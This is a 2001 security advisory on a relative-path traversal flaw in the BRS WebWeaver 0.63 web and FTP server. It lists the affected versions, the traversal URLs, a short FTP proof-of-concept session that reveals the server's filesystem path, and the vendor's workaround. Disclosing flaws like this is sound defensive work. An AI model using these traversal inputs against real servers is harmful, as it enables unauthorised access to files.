Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
BRS WebWeaver Web Server Relative Path Vulnerability
A vulnerability exists in BRS WebWeaver 0.63 that lets an attacker use relative paths to break out of an FTP root.
Ken Pfeil
April 29, 2001
2 Min Read
Reported April 29, 2001, by JoeTesta.
VERSION AFFECTED
BRS WebWeaver 0.63 for Windows NT and Windows 9x
DESCRIPTION
Avulnerability exists in BRS WebWeaver 0.63 that lets an attacker use relativepaths to break out of an FTP root. For example, an attacker can access the rootdirectory where the FTP server is running by connecting to a vulnerable host andissuing the command http:///syshelp/.. andhttp:///sysimages/.. andhttp:///scripts/.. In addition, an attacker can cause theWeb server to disclose the physical path of FTP root.
DEMONSTRATION
Joe Testa provided the followingproof-of-concept scenario:
>ftp localhostConnected to xxxxxxxxxxxx.rh.rit.edu.220 BRS WebWeaver FTP Server ready.User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog331 Password required for jdog.Password:230 User jdog logged in.ftp> cd *250 CWD command successful. "/*/" is current directory.ftp> ls200 Port command successful.150 Opening data connection for directory list.c:windowsdesktop**.* not found226 File sent okftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.ftp>
VENDOR RESPONSE
No solution exists for the FTP root disclosurevulnerability. However, you can prevent the Web server root traversalvulnerability by removing all user-defined aliases (e.g., syshelp and sysimages)as well as the Internet Server API (ISAPI)/Common Gateway Interface (CGI) alias(e.g., scripts). The vendor, BlaineR. Southam, has beennotified, but has not yet provided a fix.
CREDIT
Discovered by JoeTesta.
About the Author
You May Also Like
.jpg?width=700&auto=webp&quality=80&disable=upscale)
